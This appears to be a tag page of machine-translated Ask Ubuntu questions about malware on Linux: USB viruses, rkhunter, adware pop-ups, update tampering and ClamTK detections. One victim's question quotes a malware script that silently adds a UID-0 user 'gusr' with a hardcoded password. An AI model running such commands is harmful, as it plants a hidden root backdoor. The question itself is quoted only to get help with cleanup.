Tag: 恶意软件

usb上的windows病毒会在ubuntu 16.04上运行吗？: 正如标题所暗示的那样，病毒/恶意软件/间谍软件或任何可能影响我电脑的坏事件是否真的有可能从USB转移和“自动运行”与从Windows操作系统复制的文件（可能被感染/可能不是）到Ubuntu 16.04？当我在社区中进行一些阅读时，很多用户都认为在Ubuntu操作系统中没有使用AV，因此我遵循了，因为我是一个新用户并且仍在学习/阅读几乎所有内容。或者它是否需要每次在我的Ubuntu PC中安装用户密码和“NO AUTOMATIC THINGS”“？

如何在ubuntu中安装rkhunter？: 好的我知道这个问题听起来很奇怪，但我需要帮助安装rkhunter的准确方法，我是否需要按照本文中的所有步骤https://help.ubuntu.com/community/RKhunter ？

如何在Linux上扫描我的闪存驱动器以查找Windows病毒？（不是ClamAV）: 我知道这可能听起来像是重复但不是因为我看到其他问题描述的情况完全不同于我的情况。除了其他用户，我的上网本上没有Windows分区（是的，我是新手，但我有勇气“忘记”Windows），我没有任何CD-RW驱动器。因此，我不需要从Ubuntu扫描我的Windows分区，也不像某些人推荐的那样使用任何防病毒CD。我希望，我的问题更简单。我使用了很多闪存驱动器来存储数据，自从我的“Windows时代”以来我一直在使用它。但现在我已经不知道可以“存储”在其上的可能病毒了。昨天我已经在新安装的Windows XP系统上安装了几个闪存驱动器，并带有最新的Avast！防病毒，antivisrus在我的闪存驱动器上发现了令人眼花缭乱的病毒！虽然这不会影响我，但它可能会影响其他人，因为我的所有朋友都是Windows用户，他们总是打电话给我帮助他们解决与PC相关的问题。所以，我不能去他们，并且不情愿地用病毒“淹没”他们的系统而不是帮助他们。所以我真的需要保持我的闪存驱动器清洁以防万一。注意。我不认为使用Windows系统扫描它们是一个很好的解决方案，虽然它听起来可能是最容易和最明显的。我母亲的PC运行的是Windows XP，但它是一台旧PC，既棘手又不可靠，因为它一直在下降。 ClamAV对我来说不是一个选择，因为我有一个非常糟糕的经历。我在spring使用它来扫描Windows分区（在双启动PC上），结果是一团糟，我不得不重新安装两个操作系统。从那天起，我只是讨厌ClamAV，因为我确信它会删除即使是干净整洁的文件，而它所做的只是一团糟。所以，如果你有这两个解决方案，并牢记我缺乏CD驱动器，那么你的建议将非常感激。

Ubuntu用户应该关注“Operation Windigo”吗？: Ubuntu（和其他Linux发行版）的桌面用户是否应该关注描述为“Operation Windigo”的恶意软件感染驱动器？它立即对我们构成什么威胁，是否有任何长期后果？

在Chromium上获取广告软件/恶意软件弹出窗口: 在过去的几天里，我在Ubuntu 14.04的Chromium浏览器中从www.adultcameras.info上弹出一个弹出窗口。我不记得在Chromium中安装任何新软件或扩展程序。我甚至使用终端卸载并重新安装了Chromium – 它仍然存在。添加， /etc/hosts 0.0.0.0 www.adultcameras.info也无法阻止它。我对此感到疯狂……因为它显示出成熟的内容并且在办公室里非常令人不安：/ 谁能帮我这个？解决方案：通过将DNS设置更改为Google公共DNS解决了该问题

是否可以通过ubuntu更新病毒/ rootkit？: 可能重复：系统如何保持安全？包和脚本有哪些安全策略？我担心，就像在Windows上一样，可能有办法通过（自动）系统更新来捕获恶意软件/病毒/ rootkit。有什么变化？例如，“中间的人”可能会嗅到我的网络流量，并且可以看到我在做什么（更新），然后伪造对我的回复，实际上是一个木马？ Ubuntu Canonical是否做了什么来确保他们服务器上的文件/程序/软件没有被篡改？我担心Linux是非常不安全的，而且大多数情况下，安全性只是一种幻觉，并不比其他操作系统（如Windows）更好。鉴于大多数Linux用户更可能是计算机智能，大多数恶意软件很可能只是隐藏得更好？无论如何问题是如何以及在哪里寻找选项以确保我不会失去系统安全性，因为中间的人在ubuntu的系统更新中存在。在美国，中国不安全的国家经常出国并使用许多开放的wifis我只帮助自己使用隧道VPN并在我的祖国进行了虚拟访问。仍然是互联网路由我永远不会确定如何更新安全？

启动时创建的中文字符文件夹: 我在跑： No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.1 LTS Release: 16.04 Codename: xenial 在启动时，在我的用户主目录中创建一个具有中文字符的文件夹。今天，创建了两个文件夹： drwx—— 2 andre andre 4096 Sep 19 07:53 栯浯⽥湡牤⽥挮捡敨眯扥楫⽴捩湯慤慴慢敳뫛ᰌ㏸䖺ᮻ쏫쭴/ drwx—— 2 andre andre 4096 Sep 19 07:57 栯浯⽥湡牤⽥挮捡敨眯扥楫⽴捩湯慤慴慢敳뫛疣㕲ᰰ냵調줟/ 两者都是空的。我怀疑它是一种病毒。我跑了蛤蜊，一无所获。我运行rootkit猎人并没有发现任何东西。几乎所有搜索结果都指向恶意软件Windows以及如何删除它。更新：我注意到两天前修改了/home/andre/.ssh/id_rsa.pub文件 – 不确定这是否相关在/ etc / ssh / sshd_config中将PermitRootLogin prohibit-password更改为PermitRootLogin no 结果如下： […]

如何在我的笔记本电脑上处理恶意软件？: 我相当肯定我的Ubuntu 13.10笔记本电脑感染了某种恶意软件。每隔一段时间，我发现一个进程/ lib / sshd（由root拥有）运行并消耗大量的cpu。它不是运行/ usr / sbin / sshd的sshd服务器。二进制文件具有–wxrw-rwt权限，它在/ lib目录中生成并生成脚本。最近的一个名为13959730401387633604，它执行以下操作 #!/bin/sh exec 1>/dev/null exec 2>/dev/null useradd -g 0 -u 0 -o gusr echo gusr:chaonimabi123456123 | chpasswd gusr用户是由恶意软件独立创建的，然后chpasswd在消耗100％cpu时挂起。到目前为止，我已经确定gusr用户还被添加到/ etc /中的文件 /etc/group /etc/gshadow /etc/passwd /etc/shadow /etc/subgid /etc/subuid 似乎恶意软件使用“ – ”后缀制作了所有这些文件的副本。可以在此处获取root修改的/ etc / files的完整列表。此外，/ etc / hosts文件已更改为此。 / lib […]

用ClamTK检测到病毒（可能感染？）: 我用ClamTK对我的系统进行了例行扫描。反病毒报告了3次检测。三个检测的名称是： 1. [PUA.Phishing.Bank] 2. [PUA.Phishing.Bank] 3. [PUA.Script.Packed-1] 在Firefox缓存中检测到前两个： /.cache/mozilla/firefox/ 最后一个是在Chromium缓存中检测到的： /.cache/chromium/Default 我知道PUA代表可能不需要的软件。这些误报是什么？它是Windows病毒还是Linux病毒？如果它是Linux病毒，它将如何影响我的系统？